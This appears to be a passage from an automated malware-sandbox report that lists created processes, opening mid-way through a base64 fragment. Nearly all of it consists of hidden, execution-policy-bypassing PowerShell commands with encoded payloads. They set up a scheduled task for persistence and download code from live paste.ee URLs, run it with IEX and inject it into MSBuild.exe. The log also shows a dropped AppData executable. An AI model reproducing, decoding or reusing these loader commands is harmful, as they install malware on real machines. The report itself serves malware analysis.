AEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBUAEEAQgB2AEEARwBFAEEAWgBBAEIAWABBAEcAawBBAGQAQQBCAG8AQQBGAEEAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAaABBAEcAdwBBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBvAEEAQwBjAEEAVABRAEIAcABBAEcATQBBAGMAZwBCAHYAQQBIAE0AQQBiAHcAQgBtAEEASABRAEEATABnAEIAVwBBAEcAawBBAGMAdwBCADEAQQBHAEUAQQBiAEEAQgBDAEEARwBFAEEAYwB3AEIAcABBAEcATQBBAEoAdwBBAHAAQQBEAHMAQQBKAEEAQgBtAEEARwBvAEEAUABRAEIAYgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEMANABBAFYAZwBCAHAAQQBIAE0AQQBkAFEAQgBoAEEARwB3AEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBDADQAQQBTAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgAwAEEATwBnAEEANgBBAEUATQBBAFkAUQBCAHMAQQBHAHcAQQBRAGcAQgA1AEEARwA0AEEAWQBRAEIAdABBAEcAVQBBAEsAQQBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQQBjAEkARwBBAEEAVABnAEIAZwBBAEcAVQBBAFkAQQBCAFUAQQBHAEEAQQBMAGcAQgBnAEEARgBjAEEAWQBBAEIAbABBAEcAQQBBAFEAZwBCAGcAQQBFAE0AQQBZAEEAQgBzAEEARwBBAEEAYQBRAEIAZwBBAEcAVQBBAFkAQQBCAE8AQQBHAEEAQQBWAEEAQQBkAEkAQwBrAEEATABBAEEAawBBAEgASQBBAFoAUQBCAG4AQQBDAHcAQQBXA
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmACAAKAAkAHIAZQBnACAALQBNAGEAdABjAGgAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAnACkAIAB7ACQAZAB0AD0AIAAoAFsARABhAHQAZQBUAGkAbQBlAF0AOgA6AE4AbwB3ACkAOwAkAGQAdQByAGEAdABpAG8AbgAgAD0AIAAkAGQAdAAuAEEAZABkAFkAZQBhAHIAcwAoADIANQApACAALQAkAGQAdAA7ACQAYQBjAHQAaQBvAG4AIAAgACAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBjAG0AZAAuAGUAeABlACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQBwACAAQgB5AFAAYQBzAHMAIAAtAHcAaQBuACAAMQAgAC8AbgBvAFAAIAAtAG4AbwBsAE8AZwBPACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgACQAYwBoAGUAYwBrAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbwB1AHQAcAB1AHQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBpAGYAIAAoACQAYwBoAGUAYwBrACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIAAgAFAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AZQBQACAAQgBZAFAAYQBzAFMAIAAvAG4ATwBwACAALQBuAG8AbABPAGcATwAgAC0AdwBpAG4AIAAxACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgAC8AZQAgAEoAQQBCAHkAQQBHAFUAQQBaAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEMAYwBBAGUAdwBBAHkAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeABBAEgAMABBAGUAdwBBAHoAQQBIADAAQQBKAHcAQQB0AEEARwBZAEEASgB3AEIAawBBAEYATQBBAGQAQQBBAG4AQQBDAHcAQQBKAHcAQgB5AEEARwBrAEEAYgBnAEEAbgBBAEMAdwBBAEgAQwBCAGcAQQBFAFEAQQBZAEEAQgB2AEEARwBBAEEAZAB3AEIAdQBBAEcAQQBBAGIAQQBCAGcAQQBHADgAQQBZAFEAQQBkAEkAQwB3AEEASgB3AEIAbgBBAEMAYwBBAEsAUQBBADcAQQBGAHMAQQBkAGcAQgB2AEEARwBrAEEAWgBBAEIAZABBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAEIAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBUAEEAQgB2AEEARwBFAEEAWgBBAEIAWABBAEcAawBBAGQAQQBCAG8AQQBGAEEAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAaABBAEcAdwBBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBvAEEAQwBjAEEAVABRAEIAcABBAEcATQBBAGMAZwBCAHYAQQBIAE0AQQBiAHcAQgBtAEEASABRAEEATABnAEIAVwBBAEcAawBBAGMAdwBCADEAQQBHAEUAQQBiAEEAQgBDAEEARwBFAEEAYwB3AEIAcABBAEcATQBBAEoAdwBBAHAAQQBEAHMAQQBKAEEAQgBtAEEARwBvAEEAUABRAEIAYgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEMANABBAFYAZwBCAHAAQQBIAE0AQQBkAFEAQgBoAEEARwB3AEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBDADQAQQBTAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgAwAEEATwBnAEEANgBBAEUATQBBAFkAUQBCAHMAQQBHAHcAQQBRAGcAQgA1AEEARwA0AEEAWQBRAEIAdABBAEcAVQBBAEsAQQBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQQBjAEkARwBBAEEAVABnAEIAZwBBAEcAVQBBAFkAQQBCAFUAQQBHAEEAQQBMAGcAQgBnAEEARgBjAEEAWQBBAEIAbABBAEcAQQBBAFEAZwBCAGcAQQBFAE0AQQBZAEEAQgBzAEEARwBBAEEAYQBRAEIAZwBBAEcAVQBBAFkAQQBCAE8AQQBHAEEAQQBWAEEAQQBkAEkAQwBrAEEATABBAEEAawBBAEgASQBBAFoAUQBCAG4AQQBDAHcAQQBXAHcAQgBOAEEARwBrAEEAWQB3AEI
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA; }else{ exit;}
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA; }else{ exit;}
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknownProcess created: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe 'C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe 'C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -windowstyle hidden -ExecutionPolicy Bypass PowERsHELl.`ExE -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmACAAKAAkAHIAZQBnACAALQBNAGEAdABjAGgAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAnACkAIAB7ACQAZAB0AD0AIAAoAFsARABhAHQAZQBUAGkAbQBlAF0AOgA6AE4AbwB3ACkAOwAkAGQAdQByAGEAdABpAG8AbgAgAD0AIAAkAGQAdAAuAEEAZABkAFkAZQBhAHIAcwAoADIANQApACAALQAkAGQAdAA7ACQAYQBjAHQAaQBvAG4AIAAgACAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBjAG0AZAAuAGUAeABlACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQBwACAAQgB5AFAAYQBzAHMAIAAtAHcAaQBuACAAMQAgAC8AbgBvAFAAIAAtAG4AbwBsAE8AZwBPACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgACQAYwBoAGUAYwBrAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbwB1AHQAcAB1AHQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBpAGYAIAAoACQAYwBoAGUAYwBrACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIAAgAFAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AZQBQACAAQgBZAFAAYQBzAFMAIAAvAG4ATwBwACAALQBuAG8AbABPAGcATwAgAC0AdwBpAG4AIAAxACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgAC8AZQAgAEoAQQBCAHkAQQBHAFUAQQBaAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEMAYwBBAGUAdwBBAHkAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeABBAEgAMABBAGUAdwBBAHoAQQBIADAAQQBKAHcAQQB0AEEARwBZAEEASgB3AEIAawBBAEYATQBBAGQAQQBBAG4AQQBDAHcAQQBKAHcAQgB5AEEARwBrAEEAYgBnAEEAbgBBAEMAdwBBAEgAQwBCAGcAQQBFAFEAQQBZAEEAQgB2AEEARwBBAEEAZAB3AEIAdQBBAEcAQQBBAGIAQQBCAGcAQQBHADgAQQBZAFEAQQBkAEkAQwB3AEEASgB3AEIAbgBBAEMAYwBBAEsAUQBBADcAQQBGAHMAQQBkAGcAQgB2AEEARwBrAEEAWgBBAEIAZABBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAEIAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBUAEEAQgB2AEEARwBFAEEAWgBBAEIAWABBAEcAawBBAGQAQQBCAG8AQQBGAEEAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAaABBAEcAdwBBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBvAEEAQwBjAEEAVABRAEIAcABBAEcATQBBAGMAZwBCAHYAQQBIAE0AQQBiAHcAQgBtAEEASABRAEEATABnAEIAVwBBAEcAawBBAGMAdwBCADEAQQBHAEUAQQBiAEEAQgBDAEEARwBFAEEAYwB3AEIAcABBAEcATQBBAEoAdwBBAHAAQQBEAHMAQQBKAEEAQgBtAEEARwBvAEEAUABRAEIAYgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEMANABBAFYAZwBCAHAAQQBIAE0AQQBkAFEAQgBoAEEARwB3AEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBDADQAQQBTAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgAwAEEATwBnAEEANgBBAEUATQBBAFkAUQBCAHMAQQBHAHcAQQBRAGcAQgA1AEEARwA0AEEAWQBRAEIAdABBAEcAVQBBAEsAQQBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQQBjAEkARwBBAEEAVABnAEIAZwBBAEcAVQBBAFkAQQBCAFUAQQBHAEEAQQBMAGcAQgBnAEEARgBjAEEAWQBBAEIAbABBAEcAQQBBAFEAZwBCAGcAQQBFAE0AQQBZAEEAQgBzAEEARwBBAEEAYQBRAEIAZwBBAEcAVQBBAFkAQQBCAE8AQQBHAEEAQQBWAEEAQQBkAEkAQwBrAEEATABBAEEAawBBAEgASQBBAFoAUQBCAG4AQQBDAHcAQQBXA
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmACAAKAAkAHIAZQBnACAALQBNAGEAdABjAGgAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAnACkAIAB7ACQAZAB0AD0AIAAoAFsARABhAHQAZQBUAGkAbQBlAF0AOgA6AE4AbwB3ACkAOwAkAGQAdQByAGEAdABpAG8AbgAgAD0AIAAkAGQAdAAuAEEAZABkAFkAZQBhAHIAcwAoADIANQApACAALQAkAGQAdAA7ACQAYQBjAHQAaQBvAG4AIAAgACAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBjAG0AZAAuAGUAeABlACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQBwACAAQgB5AFAAYQBzAHMAIAAtAHcAaQBuACAAMQAgAC8AbgBvAFAAIAAtAG4AbwBsAE8AZwBPACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgACQAYwBoAGUAYwBrAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbwB1AHQAcAB1AHQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBpAGYAIAAoACQAYwBoAGUAYwBrACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIAAgAFAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AZQBQACAAQgBZAFAAYQBzAFMAIAAvAG4ATwBwACAALQBuAG8AbABPAGcATwAgAC0AdwBpAG4AIAAxACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgAC8AZQAgAEoAQQBCAHkAQQBHAFUAQQBaAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEMAYwBBAGUAdwBBAHkAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeABBAEgAMABBAGUAdwBBAHoAQQBIADAAQQBKAHcAQQB0AEEARwBZAEEASgB3AEIAawBBAEYATQBBAGQAQQBBAG4AQQBDAHcAQQBKAHcAQgB5AEEARwBrAEEAYgBnAEEAbgBBAEMAdwBBAEgAQwBCAGcAQQBFAFEAQQBZAEEAQgB2AEEARwBBAEEAZAB3AEIAdQBBAEcAQQBBAGIAQQBCAGcAQQBHADgAQQBZAFEAQQBkAEkAQwB3AEEASgB3AEIAbgBBAEMAYwBBAEsAUQBBADcAQQBGAHMAQQBkAGcAQgB2AEEARwBrAEEAWgBBAEIAZABBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAEIAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBUAEEAQgB2AEEARwBFAEEAWgBBAEIAWABBAEcAawBBAGQAQQBCAG8AQQBGAEEAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAaABBAEcAdwBBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBvAEEAQwBjAEEAVABRAEIAcABBAEcATQBBAGMAZwBCAHYAQQBIAE0AQQBiAHcAQgBtAEEASABRAEEATABnAEIAVwBBAEcAawBBAGMAdwBCADEAQQBHAEUAQQBiAEEAQgBDAEEARwBFAEEAYwB3AEIAcABBAEcATQBBAEoAdwBBAHAAQQBEAHMAQQBKAEEAQgBtAEEARwBvAEEAUABRAEIAYgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEMANABBAFYAZwBCAHAAQQBIAE0AQQBkAFEAQgBoAEEARwB3AEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBDADQAQQBTAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgAwAEEATwBnAEEANgBBAEUATQBBAFkAUQBCAHMAQQBHAHcAQQBRAGcAQgA1AEEARwA0AEEAWQBRAEIAdABBAEcAVQBBAEsAQQBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQQBjAEkARwBBA